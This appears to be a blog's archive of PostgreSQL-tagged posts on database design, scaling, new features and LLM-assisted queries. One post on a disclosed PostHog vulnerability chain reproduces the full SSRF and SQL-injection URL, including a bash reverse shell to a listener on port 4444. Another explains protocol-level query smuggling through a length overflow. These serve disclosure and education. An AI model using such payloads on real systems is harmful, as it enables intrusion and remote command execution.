157 posts tagged “postgresql”

2025

But once we got that and got this aviation grade testing in place, the number of bugs just dropped to a trickle. Now we still do have bugs but the aviation grade testing allows us to move fast, which is important because in this business you either move fast or you're disrupted. So, we're able to make major changes to the structure of the code that we deliver and be confident that we're not breaking things because we had these intense tests. Probably half the time we spend is actually writing new tests, we're constantly writing new tests. And over the 17-year history, we have amassed a huge suite of tests which we run constantly.

Other database engines don't do this; don't have this level of testing. But they're still high quality, I mean, I noticed in particular, PostgreSQL is a very high-quality database engine, they don't have many bugs. I went to the PostgreSQL and ask them “how do you prevent the bugs”? We talked about this for a while. What I came away with was they've got a very elaborate peer review process, and if they've got code that has worked for 10 years they just don't mess with it, leave it alone, it works. Whereas we change our code fearlessly, and we have a much smaller team and we don't have the peer review process.

— D. Richard Hipp, ACM SIGMOD Record, June 2019 (PDF)

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain (via) Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.

The way in abuses a webhooks system with non-robust URL validation, setting up an SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.

Here's the URL that gets injected:

http://clickhouse:8123/?query=SELECT+*+FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT+*+FROM+cmd_exec;+--\",'posthog','posthog')#

Reformatted a little for readability:

http://clickhouse:8123/?query=

SELECT *

FROM postgresql(

'db:5432',

'posthog',

"posthog_use')) TO STDOUT;

END;

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec (

cmd_output text

);

COPY cmd_exec

FROM PROGRAM $$

bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"

$$;

SELECT * FROM cmd_exec;

--",

'posthog',

'posthog'

)

#

This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in ClickHouse's PostgreSQL function (since fixed). That query in turn abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.

The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.
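One common mitigation for the SSRF step is to resolve a webhook's hostname and refuse anything that lands on a non-public address. The following is a minimal Python sketch of that idea, not PostHog's actual fix: is_safe_webhook_url and resolve_host are hypothetical names, and the check alone does not cover redirects or DNS rebinding.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_host(hostname):
    """Return every IP address the hostname resolves to, using system DNS."""
    infos = socket.getaddrinfo(hostname, None)
    return sorted({info[4][0] for info in infos})


def is_safe_webhook_url(url, resolver=resolve_host):
    """Hypothetical helper: accept only http(s) URLs whose host is public."""
    try:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        addresses = resolver(parts.hostname)
        # Reject the URL if any resolved address is private, loopback,
        # link-local or otherwise not globally routable.
        return bool(addresses) and all(
            ipaddress.ip_address(address).is_global for address in addresses
        )
    except (OSError, ValueError):
        # DNS failures and unparseable hosts or addresses are treated as unsafe.
        return False
```

The resolver argument exists so the check can be exercised without network access; a real deployment would also need to pin the resolved address for the request that follows.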

How I automate my Substack newsletter with content from my blog

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There’s a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack.

[... 1,345 words]

The case against pgvector (via) I wasn't keen on the title of this piece but the content is great: Alex Jacobs talks through lessons learned trying to run the popular pgvector PostgreSQL vector indexing extension at scale, in particular the challenges involved in maintaining a large index with close-to-realtime updates using the IVFFlat or HNSW index types.

The section on pre- vs. post-filtering is particularly useful:

Okay but let's say you solve your index and insert problems. Now you have a document search system with millions of vectors. Documents have metadata---maybe they're marked as draft, published, or archived. A user searches for something, and you only want to return published documents.

[...] should Postgres filter on status first (pre-filter) or do the vector search first and then filter (post-filter)?

This seems like an implementation detail. It’s not. It’s the difference between queries that take 50ms and queries that take 5 seconds. It’s also the difference between returning the most relevant results and… not.
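To make the relevance half of that trade-off concrete, here is a small Python sketch using exact brute-force search over made-up two-dimensional vectors. It is an illustration under those assumptions, not how pgvector's approximate indexes work internally; DOCS, pre_filter and post_filter are hypothetical names.

```python
import math

# Made-up documents: only ids 3 and 4 are published.
DOCS = [
    {"id": 1, "status": "draft", "embedding": [1.0, 0.0]},
    {"id": 2, "status": "archived", "embedding": [0.9, 0.1]},
    {"id": 3, "status": "published", "embedding": [0.7, 0.3]},
    {"id": 4, "status": "published", "embedding": [0.1, 0.9]},
    {"id": 5, "status": "draft", "embedding": [0.8, 0.2]},
]


def cosine_distance(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norms = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return 1.0 - dot / norms


def nearest(docs, query, k):
    """Exact k-nearest-neighbour search by cosine distance."""
    return sorted(docs, key=lambda d: cosine_distance(d["embedding"], query))[:k]


def pre_filter(docs, query, k, status="published"):
    """Filter on status first, then search only the matching documents."""
    candidates = [d for d in docs if d["status"] == status]
    return [d["id"] for d in nearest(candidates, query, k)]


def post_filter(docs, query, k, status="published"):
    """Search everything first, then drop results with the wrong status."""
    return [d["id"] for d in nearest(docs, query, k) if d["status"] == status]
```

With the query [1.0, 0.0] and k=2, pre_filter returns the two published documents, while post_filter returns nothing because the two nearest neighbours overall are a draft and an archived document.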

The Hacker News thread for this article attracted a robust discussion, including some fascinating comments by Discourse developer Rafael dos Santos Silva (xfalcox) about how they are using pgvector at scale:

We [run pgvector in production] at Discourse, in thousands of databases, and it's leveraged in most of the billions of page views we serve. [...]

Also worth mentioning that we use quantization extensively:

- halfvec (16bit float) for storage

- bit (binary vectors) for indexes

Which makes the storage cost and on-going performance good enough that we could enable this in all our hosting. [...]

In Discourse embeddings power:

- Related Topics, a list of topics to read next, which uses embeddings of the current topic as the key to search for similar ones

- Suggesting tags and categories when composing a new topic

- Augmented search

- RAG for uploaded files
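The two quantization steps mentioned in that comment can be sketched in plain Python. This is a rough illustration rather than pgvector's implementation: the function names are hypothetical, and the "greater than zero becomes 1" rule is my assumption about how binary quantization is typically defined.

```python
import struct


def to_half_precision(vector):
    """Round-trip a vector through 16-bit floats (2 bytes per dimension)."""
    packed = struct.pack(f"<{len(vector)}e", *vector)
    return list(struct.unpack(f"<{len(vector)}e", packed))


def binary_quantize(vector):
    """Keep one bit per dimension: 1 for positive values, 0 otherwise."""
    return [1 if x > 0 else 0 for x in vector]


def hamming_distance(a, b):
    """Count the positions where two bit vectors differ."""
    return sum(x != y for x, y in zip(a, b))
```

Half precision halves storage compared to 32-bit floats, and bit vectors compared by Hamming distance are far smaller again, which is the kind of saving the comment is describing.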

Using UUIDv7 is generally discouraged for security when the primary key is exposed to end users in external-facing applications or APIs. The main issue is that UUIDv7 incorporates a 48-bit Unix timestamp as its most significant part, meaning the identifier itself leaks the record's creation time.

This leakage is primarily a privacy concern. Attackers can use the timing data as metadata for de-anonymization or account correlation, potentially revealing activity patterns or growth rates within an organization.

— Alexander Fridriksson and Jay Miller, Exploring PostgreSQL 18's new UUIDv7 support
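The leak is easy to demonstrate. The Python sketch below builds a UUIDv7-shaped value by hand (make_uuid7 is a hypothetical helper, written out so the example does not depend on a recent standard library) and then recovers the creation time from the top 48 bits.

```python
import datetime
import os
import uuid

EPOCH = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)


def make_uuid7(unix_ms, random_bytes=None):
    """Build a UUIDv7-shaped value: 48-bit millisecond timestamp, then random bits.

    random_bytes, if given, is assumed to be exactly 10 bytes long.
    """
    rand = int.from_bytes(random_bytes or os.urandom(10), "big")  # 80 bits
    value = ((unix_ms & 0xFFFFFFFFFFFF) << 80) | rand
    value = (value & ~(0xF << 76)) | (0x7 << 76)  # version field = 7
    value = (value & ~(0x3 << 62)) | (0x2 << 62)  # variant bits = 10
    return uuid.UUID(int=value)


def uuid7_created_at(value):
    """Recover the creation time from the top 48 bits of a UUIDv7."""
    return EPOCH + datetime.timedelta(milliseconds=value.int >> 80)
```

Anyone who sees the identifier can call something like uuid7_created_at on it, with no access to the database required.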

AI for data engineers with Simon Willison. I recorded an episode last week with Claire Giordano for the Talking Postgres podcast. The topic was "AI for data engineers" but we ended up covering an enjoyable range of different topics.

- How I got started programming with a Commodore 64 - the tape drive for which inspired the name Datasette

- Selfish motivations for TILs (force me to write up my notes) and open source (help me never have to solve the same problem twice)

- LLMs have been good at SQL for a couple of years now. Here's how I used them for a complex PostgreSQL query that extracted alt text from my blog's images using regular expressions

- Structured data extraction as the most economically valuable application of LLMs for data work

- 2025 has been the year of tool calling in a loop ("agentic" if you like)

- Thoughts on running MCPs securely - read-only database access, think about sandboxes, use PostgreSQL permissions, watch out for the lethal trifecta

- Jargon guide: Agents, MCP, RAG, Tokens

- How to get started learning to prompt: play with the models and "bring AI to the table" even for tasks that you don't think it can handle

- "It's always a good day if you see a pelican"

tidwall/pogocache (via) New project from Josh Baker, author of the excellent tg C geospatial library (covered previously) and various other interesting projects:

Pogocache is fast caching software built from scratch with a focus on low latency and cpu efficiency.

Faster: Pogocache is faster than Memcache, Valkey, Redis, Dragonfly, and Garnet. It has the lowest latency per request, providing the quickest response times. It's optimized to scale from one to many cores, giving you the best single-threaded and multithreaded performance.

Faster than Memcache and Redis is a big claim! The README includes a design details section that explains how the system achieves that performance, using a sharded hashmap inspired by Josh's shardmap project and clever application of threads.

Performance aside, the most interesting thing about Pogocache is the server interface it provides: it emulates the APIs for Redis and Memcached, provides a simple HTTP API and lets you talk to it over the PostgreSQL wire protocol as well!

psql -h localhost -p 9401

=> SET first Tom;

=> SET last Anderson;

=> SET age 37;

$ curl http://localhost:9401/last

Anderson

Postgres LISTEN/NOTIFY does not scale (via) I think this headline is justified. Recall.ai, a provider of meeting transcription bots, noticed that their PostgreSQL instance was being bogged down by heavy concurrent writes.

After some spelunking they found this comment in the PostgreSQL source explaining that transactions with a pending notification take out a global lock against the entire PostgreSQL instance (represented by database 0) to ensure "that queue entries appear in commit order".

Switching away from LISTEN/NOTIFY as the mechanism for triggering actions on row changes gave them a significant performance boost under high write loads.

Announcing PlanetScale for Postgres. PlanetScale formed in 2018 to build a commercial offering on top of the Vitess MySQL sharding open source project, which was originally released by YouTube in 2012. The PlanetScale founders were the co-creators and maintainers of Vitess.

Today PlanetScale are announcing a private preview of their new horizontally sharded PostgreSQL solution, due to "overwhelming" demand.

Notably, it doesn't use Vitess under the hood:

Vitess is one of PlanetScale’s greatest strengths [...] We have made explicit sharding accessible to hundreds of thousands of users and it is time to bring this power to Postgres. We will not however be using Vitess to do this.

Vitess’ achievements are enabled by leveraging MySQL’s strengths and engineering around its weaknesses. To achieve Vitess’ power for Postgres we are architecting from first principles.

Meanwhile, on June 10th Supabase announced that they had hired Vitess co-creator Sugu Sougoumarane to help them build "Multigres: Vitess for Postgres". Sugu said:

For some time, I've been considering a Vitess adaptation for Postgres, and this feeling had been gradually intensifying. The recent explosion in the popularity of Postgres has fueled this into a full-blown obsession. [...]

The project to address this problem must begin now, and I'm convinced that Vitess provides the most promising foundation.

I remember when MySQL was an order of magnitude more popular than PostgreSQL, and Heroku's decision to only offer PostgreSQL back in 2007 was a surprising move. The vibes have certainly shifted.

PR #537: Fix Markdown in og descriptions. Since OpenAI Codex is now available to us ChatGPT Plus subscribers I decided to try it out against my blog.

It's a very nice implementation of the GitHub-connected coding "agent" pattern, as also seen in Google's Jules and Microsoft's Copilot Coding Agent.

First I had to configure an environment for it. My Django blog uses PostgreSQL which isn't part of the default Codex container, so I had Claude Sonnet 4 help me come up with a startup recipe to get PostgreSQL working.

I attached my simonw/simonwillisonblog GitHub repo and used the following as the "setup script" for the environment:

# Install PostgreSQL

apt-get update && apt-get install -y postgresql postgresql-contrib

# Start PostgreSQL service

service postgresql start

# Create a test database and user

sudo -u postgres createdb simonwillisonblog

sudo -u postgres psql -c "CREATE USER testuser WITH PASSWORD 'testpass';"

sudo -u postgres psql -c "GRANT ALL PRIVILEGES ON DATABASE simonwillisonblog TO testuser;"

sudo -u postgres psql -c "ALTER USER testuser CREATEDB;"

pip install -r requirements.txt

I left "Agent internet access" off for reasons described previously.

Then I prompted Codex with the following (after one previous experimental task to check that it could run my tests):

Notes and blogmarks can both use Markdown.

They serve meta property="og:description" content=" tags on the page, but those tags include that raw Markdown which looks bad on social media previews.

Fix it so they instead use just the text with markdown stripped - so probably render it to HTML and then strip the HTML tags.

Include passing tests.

Try to run the tests, the postgresql details are:

database = simonwillisonblog

username = testuser

password = testpass

Put those in the DATABASE_URL environment variable.

I left it to churn away for a few minutes (4m12s, to be precise) and it came back with a fix that edited two templates and added one more (passing) test. Here's that change in full.
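For a sense of what the "strip the HTML tags" half of that prompt involves, here is a standard-library Python sketch. It is not the change Codex made: strip_tags is a hypothetical helper, and it assumes the Markdown has already been rendered to HTML by some other step.

```python
from html.parser import HTMLParser


class _TextExtractor(HTMLParser):
    """Collect only the text nodes of an HTML fragment."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.chunks = []

    def handle_data(self, data):
        self.chunks.append(data)


def strip_tags(html):
    """Return the text content of html with runs of whitespace collapsed."""
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    return " ".join("".join(parser.chunks).split())
```

Collapsing whitespace keeps the result suitable for a single-line meta description.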

And sure enough, the social media cards for my posts now look like this - no visible Markdown any more:

New dashboard: alt text for all my images. I got curious today about how I'd been using alt text for images on my blog, and realized that since I have Django SQL Dashboard running on this site and PostgreSQL is capable of parsing HTML with regular expressions I could probably find out using a SQL query.

I pasted my PostgreSQL schema into Claude and gave it a pretty long prompt:

Give this PostgreSQL schema I want a query that returns all of my images and their alt text. Images are sometimes stored as HTML image tags and other times stored in markdown.

blog_quotation.quotation, blog_note.body both contain markdown. blog_blogmark.commentary has markdown if use_markdown is true or HTML otherwise. blog_entry.body is always HTML

Write me a SQL query to extract all of my images and their alt tags using regular expressions. In HTML documents it should look for either <img .* src="..." .* alt="..." or <img alt="..." .* src="..." (images may be self-closing XHTML style in some places). In Markdown they will always be `![alt text](url)`

I want the resulting table to have three columns: URL, alt_text, src - the URL column needs to be constructed as e.g. /2025/Feb/2/slug for a record where created is on 2nd feb 2025 and the slug column contains slug

Use CTEs and unions where appropriate

It almost got it right on the first go, and with a couple of follow-up prompts I had the query I wanted. I also added the option to search my alt text / image URLs, which has already helped me hunt down and fix a few old images on expired domain names. Here's a copy of the finished 100 line SQL query.
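The same extraction idea can be sketched in Python for anyone who wants to experiment outside the database. This is not the finished SQL query: extract_images is a hypothetical helper, and the patterns are deliberately simple (for example, they would also pick up a data-src attribute).

```python
import re

HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
ATTRIBUTE = re.compile(r'\b(src|alt)\s*=\s*"([^"]*)"', re.IGNORECASE)
MARKDOWN_IMG = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def extract_images(text):
    """Return (src, alt_text) pairs from HTML img tags and Markdown images."""
    images = []
    for tag in HTML_IMG.findall(text):
        # Attribute order does not matter: collect src and alt from the tag.
        attrs = {name.lower(): value for name, value in ATTRIBUTE.findall(tag)}
        if "src" in attrs:
            images.append((attrs["src"], attrs.get("alt", "")))
    for alt, src in MARKDOWN_IMG.findall(text):
        images.append((src, alt))
    return images
```

Parsing each tag's attributes separately avoids needing one pattern per attribute order, which the prompt handled by listing both orders.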

suitenumerique/docs. New open source (MIT licensed) collaborative text editing web application, similar to Google Docs or Notion, notable because it's a joint effort funded by the French and German governments and "currently onboarding the Netherlands".

It's built using Django and React:

Docs is built on top of Django Rest Framework, Next.js, BlockNote.js, HocusPocus and Yjs.

Deployments currently require Kubernetes, PostgreSQL, memcached, an S3 bucket (or compatible) and an OIDC provider.

Merklemap runs a 16TB PostgreSQL. Interesting thread on Hacker News where Pierre Barre describes the database architecture behind Merklemap, a certificate transparency search engine.

I run a 100 billion+ rows Postgres database [0], that is around 16TB, it's pretty painless!

There are a few tricks that make it run well (PostgreSQL compiled with a non-standard block size, ZFS, careful VACUUM planning). But nothing too out of the ordinary.

ATM, I insert about 150,000 rows a second, run 40,000 transactions a second, and read 4 million rows a second.

[...]

It's self-hosted on bare metal, with standby replication, normal settings, nothing "weird" there.

6 NVMe drives in raidz-1, 1024GB of memory, a 96 core AMD EPYC cpu.

[...]

About 28K euros of hardware per replica [one-time cost] IIRC + [ongoing] colo costs.

Xata Agent (via) Xata are a hosted PostgreSQL company who also develop the open source pgroll and pgstream schema migration tools.

Their new "Agent" tool is a system that helps monitor and optimize a PostgreSQL server using prompts to LLMs.

Any time I see a new tool like this I go hunting for the prompts. It looks like the main system prompts for orchestrating the tool live here - here's a sample:

Provide clear, concise, and accurate responses to questions. Use the provided tools to get context from the PostgreSQL database to answer questions. When asked why a query is slow, call the explainQuery tool and also take into account the table sizes. During the initial assessment use the getTablesAndInstanceInfo, getPerfromanceAndVacuumSettings, and getPostgresExtensions tools. When asked to run a playbook, use the getPlaybook tool to get the playbook contents. Then use the contents of the playbook as an action plan. Execute the plan step by step.

The really interesting thing is those playbooks, each of which is implemented as a prompt in the lib/tools/playbooks.ts file. There are six of these so far:

- SLOW_QUERIES_PLAYBOOK

- GENERAL_MONITORING_PLAYBOOK

- TUNING_PLAYBOOK

- INVESTIGATE_HIGH_CPU_USAGE_PLAYBOOK

- INVESTIGATE_HIGH_CONNECTION_COUNT_PLAYBOOK

- INVESTIGATE_LOW_MEMORY_PLAYBOOK

Here's the full text of INVESTIGATE_LOW_MEMORY_PLAYBOOK:

Objective: To investigate and resolve low freeable memory in the PostgreSQL database.

Step 1: Get the freeable memory metric using the tool getInstanceMetric.

Step 3: Get the instance details and compare the freeable memory with the amount of memory available.

Step 4: Check the logs for any indications of memory pressure or out of memory errors. If there are, make sure to report that to the user. Also this would mean that the situation is critical.

Step 4: Check active queries. Use the tool getConnectionsGroups to get the currently active queries. If a user or application stands out for doing a lot of work, record that to indicate to the user.

Step 5: Check the work_mem setting and shared_buffers setting. Think if it would make sense to reduce these in order to free up memory.

Step 6: If there is no clear root cause for using memory, suggest to the user to scale up the Postgres instance. Recommend a particular instance class.

This is the first time I've seen prompts arranged in a "playbooks" pattern like this. What a weird and interesting way to write software!

2024

DSQL Vignette: Reads and Compute. Marc Brooker is one of the engineers behind AWS's new Aurora DSQL horizontally scalable database. Here he shares all sorts of interesting details about how it works under the hood.

The system is built around the principle of separating storage from compute: storage uses S3, while compute runs in Firecracker:

Each transaction inside DSQL runs in a customized Postgres engine inside a Firecracker MicroVM, dedicated to your database. When you connect to DSQL, we make sure there are enough of these MicroVMs to serve your load, and scale up dynamically if needed. We add MicroVMs in the AZs and regions your connections are coming from, keeping your SQL query processor engine as close to your client as possible to optimize for latency.

We opted to use PostgreSQL here because of its pedigree, modularity, extensibility, and performance. We’re not using any of the storage or transaction processing parts of PostgreSQL, but are using the SQL engine, an adapted version of the planner and optimizer, and the client protocol implementation.

The system then provides strong repeatable-read transaction isolation using MVCC and EC2's high precision clocks, enabling reads "as of time X" including against nearby read replicas.

The storage layer supports index scans, which means the compute layer can push down some operations allowing it to load a subset of the rows it needs, reducing round-trips that are affected by speed-of-light latency.

The overall approach here is disaggregation: we’ve taken each of the critical components of an OLTP database and made it a dedicated service. Each of those services is independently horizontally scalable, most of them are shared-nothing, and each can make the design choices that is most optimal in its domain.

Introducing Amazon Aurora DSQL (via) New, weird-shaped database from AWS. It's (loosely) PostgreSQL compatible, claims "virtually unlimited scale" and can be set up as a single-region cluster or as a multi-region setup that somehow supports concurrent reads and writes across all regions. I'm hoping they publish technical details on how that works at some point in the future (update: they did). Right now they just say this:

When you create a multi-Region cluster, Aurora DSQL creates another cluster in a different Region and links them together. Adding linked Regions makes sure that all changes from committed transactions are replicated to the other linked Regions. Each linked cluster has a Regional endpoint, and Aurora DSQL synchronously replicates writes across Regions, enabling strongly consistent reads and writes from any linked cluster.

Here's the list of unsupported PostgreSQL features - most notably views, triggers, sequences, foreign keys and extensions. A single transaction can also modify only up to 10,000 rows.

No pricing information yet (it's in a free preview) but it looks like this one may be true scale-to-zero, unlike some of their other recent "serverless" products - Amazon Aurora Serverless v2 has a baseline charge no matter how heavily you are using it. (Update: apparently that changed on 20th November 2024 when they introduced an option to automatically pause a v2 serverless instance, which then "takes less than 15 seconds to resume".)

Dashboard: Tools. I used Django SQL Dashboard to spin up a dashboard that shows all of the URLs to my tools.simonwillison.net site that I've shared on my blog so far. It uses this (Claude assisted) regular expression in a PostgreSQL SQL query:

select distinct on (tool_url)

unnest(regexp_matches(

body,

'(https://tools\.simonwillison\.net/[^<"\s)]+)',

'g'

)) as tool_url,

'https://simonwillison.net/' || left(type, 1) || '/' || id as blog_url,

title,

date(created) as created

from content

I've been really enjoying having a static hosting platform (it's GitHub Pages serving my simonw/tools repo) that I can use to quickly deploy little HTML+JavaScript interactive tools and demos.

PostgreSQL 17: SQL/JSON is here! (via) Hubert Lubaczewski dives into the new JSON features added in PostgreSQL 17, released a few weeks ago on the 26th of September. This is the latest in his long series of similar posts about new PostgreSQL features.

The features are based on the new SQL:2023 standard from June 2023. If you want to actually read the specification for SQL:2023 it looks like you have to buy a PDF from ISO for 194 Swiss Francs (currently $226). Here's a handy summary by Peter Eisentraut: SQL:2023 is finished: Here is what's new.

There's a lot of neat stuff in here. I'm particularly interested in the json_table() table-valued function, which can convert a JSON string into a table with quite a lot of flexibility. You can even specify a full table schema as part of the function call:

SELECT * FROM json_table(

'[{"a":10,"b":20},{"a":30,"b":40}]'::jsonb,

'$[*]'

COLUMNS (

id FOR ORDINALITY,

column_a int4 path '$.a',

column_b int4 path '$.b',

a int4,

b int4,

c text

)

);

SQLite has solid JSON support already and often imitates PostgreSQL features, so I wonder if we'll see an update to SQLite that reflects some aspects of this new syntax.
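To show the shape of the result I would expect from that json_table() call, here is a Python emulation. It is a sketch based on my reading of the feature (columns without an explicit path read the key matching their own name, and missing keys become NULL), not output captured from PostgreSQL; json_table_rows is a hypothetical name.

```python
import json


def json_table_rows(document):
    """Emulate the example: one row per array element, with an ordinality column."""
    rows = []
    for ordinal, item in enumerate(json.loads(document), start=1):
        rows.append({
            "id": ordinal,                # id FOR ORDINALITY
            "column_a": item.get("a"),    # path '$.a'
            "column_b": item.get("b"),    # path '$.b'
            "a": item.get("a"),           # no path given: assumed to read '$.a'
            "b": item.get("b"),           # no path given: assumed to read '$.b'
            "c": item.get("c"),           # missing key: None, standing in for NULL
        })
    return rows
```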

Python Developers Survey 2023 Results (via) The seventh annual Python survey is out. Here are the things that caught my eye or that I found surprising:

25% of survey respondents had been programming in Python for less than a year, and 33% had less than a year of professional experience.

37% of Python developers reported contributing to open-source projects last year - a new question for the survey. This is delightfully high!

6% of users are still using Python 2. The survey notes:

Almost half of Python 2 holdouts are under 21 years old and a third are students. Perhaps courses are still using Python 2?

In web frameworks, Flask and Django neck and neck at 33% each, but FastAPI is a close third at 29%! Starlette is at 6%, but that's an under-count because it's the basis for FastAPI.

The most popular library in "other framework and libraries" was BeautifulSoup with 31%, then Pillow 28%, then OpenCV-Python at 22% (wow!) and Pydantic at 22%. Tkinter had 17%. These numbers are all a surprise to me.

pytest scores 52% for unit testing, unittest from the standard library just 25%. I'm glad to see pytest so widely used, it's my favourite testing tool across any programming language.

The top cloud providers are AWS, then Google Cloud Platform, then Azure... but PythonAnywhere (11%) took fourth place just ahead of DigitalOcean (10%). And Alibaba Cloud is a new entrant in sixth place (after Heroku) with 4%. Heroku's ending of its free plan dropped them from 14% in 2021 to 7% now.

Linux and Windows equal at 55%, macOS is at 29%. This was one of many multiple-choice questions that could add up to more than 100%.

In databases, SQLite usage was trending down - 38% in 2021 to 34% for 2023, but still in second place behind PostgreSQL, stable at 43%.

The survey incorporates quotes from different Python experts responding to the numbers, it's worth reading through the whole thing.

My goal is to keep SQLite relevant and viable through the year 2050. That's a long time from now. If I knew that standard SQL was not going to change any between now and then, I'd go ahead and make non-standard extensions that allowed for FROM-clause-first queries, as that seems like a useful extension. The problem is that standard SQL will not remain static. Probably some future version of "standard SQL" will support some kind of FROM-clause-first query format. I need to ensure that whatever SQLite supports will be compatible with the standard, whenever it drops. And the only way to do that is to support nothing until after the standard appears.

When will that happen? A month? A year? Ten years? Who knows.

I'll probably take my cue from PostgreSQL. If PostgreSQL adds support for FROM-clause-first queries, then I'll do the same with SQLite, copying the PostgreSQL syntax. Until then, I'm afraid you are stuck with only traditional SELECT-first queries in SQLite.

New Django {% querystring %} template tag. Django 5.1 came out last week and includes a neat new template tag which solves a problem I've faced a bunch of times in the past.

{% querystring color="red" size="S" %}

Adds ?color=red&size=S to the current URL - keeping any other existing parameters and replacing the current value for color or size if it's already set.

{% querystring color=None %}

Removes the ?color= parameter if it is currently set.

If the value passed is a list it will append ?color=red&color=blue for as many items as exist in the list.

You can access values in variables and you can also assign the result to a new template variable rather than outputting it directly to the page:

{% querystring page=page.next_page_number as next_page %}
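The behaviour described above can be approximated in a few lines of plain Python. This is a sketch of the semantics, not Django's implementation: querystring here is a hypothetical standalone function that takes the current query string as its first argument.

```python
from urllib.parse import parse_qs, urlencode


def querystring(current_query, **changes):
    """Return an updated query string, keeping parameters that are not changed."""
    params = parse_qs(current_query, keep_blank_values=True)
    for key, value in changes.items():
        if value is None:
            params.pop(key, None)                      # None removes the parameter
        elif isinstance(value, (list, tuple)):
            params[key] = [str(v) for v in value]      # lists repeat the key
        else:
            params[key] = [str(value)]                 # scalars replace the value
    encoded = urlencode(params, doseq=True)
    return "?" + encoded if encoded else ""
```

For example, querystring("page=2&color=blue", color="red", size="S") keeps page=2, replaces color and appends size.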

Other things that caught my eye in Django 5.1:

- PostgreSQL connection pools.

- The new LoginRequiredMiddleware for making every page in an application require login.

- The SQLite database backend now accepts init_command for setting things like PRAGMA cache_size=2000 on new connections.

- SQLite can also be passed "transaction_mode": "IMMEDIATE" to configure the behaviour of transactions.



SQL Injection Isn’t Dead: Smuggling Queries at the Protocol Level (via) PDF slides from a presentation by Paul Gerste at DEF CON 32. It turns out some databases have vulnerabilities in their binary protocols that can be exploited by carefully crafted SQL queries.

Paul demonstrates an attack against PostgreSQL (which works in some but not all of the PostgreSQL client libraries) which uses a message size overflow, by embedding a string longer than 4GB (2**32 bytes) which overflows the maximum length of a string in the underlying protocol and writes data to the subsequent value. He then shows a similar attack against MongoDB.

The current way to protect against these attacks is to ensure a size limit on incoming requests. This can be more difficult than you may expect - Paul points out that alternative paths such as WebSockets might bypass limits that are in place for regular HTTP requests, plus some servers may apply limits before decompression, allowing an attacker to send a compressed payload that is larger than the configured limit.
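The core of the overflow can be modelled without allocating 4GB of anything. The Python sketch below is a simplified illustration, not any real client library's code: it assumes a 4-byte length prefix, and the function names are hypothetical.

```python
import struct

MAX_LENGTH = 0xFFFFFFFF  # largest value a 4-byte unsigned length field can hold


def encode_length_unchecked(payload_length):
    """Mimic a vulnerable client that silently truncates the length to 32 bits."""
    return struct.pack("!I", payload_length & MAX_LENGTH)


def declared_length(header):
    """Read the length a server would see in the 4-byte header."""
    return struct.unpack("!I", header)[0]


def smuggled_bytes(payload_length):
    """Bytes left over after the declared length, parsed as further messages."""
    return payload_length - declared_length(encode_length_unchecked(payload_length))


def encode_length_checked(payload_length):
    """Safer variant: refuse payloads the length field cannot represent."""
    if payload_length > MAX_LENGTH:
        raise ValueError("payload too large for a 32-bit length field")
    return struct.pack("!I", payload_length)
```

A payload of 2**32 + 16 bytes is announced as 16 bytes, so everything after those 16 bytes is interpreted as whatever messages the attacker chose to place there.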

How to Get or Create in PostgreSQL (via) Get or create - for example to retrieve an existing tag record from a database table if it already exists or insert it if it doesn’t - is a surprisingly difficult operation.

Haki Benita uses it to illustrate a variety of interesting PostgreSQL concepts.

New to me: a pattern that runs INSERT INTO tags (name) VALUES (tag_name) RETURNING *; and then catches the constraint violation and returns a record instead has a disadvantage at scale: “The table contains a dead tuple for every attempt to insert a tag that already existed” - so until vacuum runs you can end up with significant table bloat!

Haki’s conclusion is that the best solution relies on a feature coming in PostgreSQL 17: the ability to combine the MERGE operation with a RETURNING clause:

WITH new_tags AS (

MERGE INTO tags

USING (VALUES ('B'), ('C')) AS t(name)

ON tags.name = t.name

WHEN NOT MATCHED THEN

INSERT (name) VALUES (t.name)

RETURNING *

)

SELECT * FROM tags WHERE name IN ('B', 'C')

UNION ALL

SELECT * FROM new_tags;

I wonder what the best pattern for this in SQLite is. Could it be as simple as this?

INSERT OR IGNORE INTO tags (name) VALUES ('B'), ('C');

The SQLite INSERT documentation doesn't currently provide extensive details for INSERT OR IGNORE, but there are some hints in this forum thread. This post by Rob Hoelz points out that INSERT OR IGNORE will silently ignore any constraint violation, so INSERT INTO tags (tag) VALUES ('C'), ('D') ON CONFLICT(tag) DO NOTHING may be a better option.
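Here is a small Python sketch of the ON CONFLICT variant using the standard library's sqlite3 module. It is one possible pattern rather than a recommendation from the SQLite documentation; the tags schema and get_or_create_tags are assumptions made for the example, and it assumes a SQLite version with upsert support.

```python
import sqlite3


def get_or_create_tags(conn, names):
    """Insert any missing tags, then return (id, name) rows for all of them."""
    conn.executemany(
        "INSERT INTO tags (name) VALUES (?) ON CONFLICT(name) DO NOTHING",
        [(name,) for name in names],
    )
    placeholders = ",".join("?" for _ in names)
    return conn.execute(
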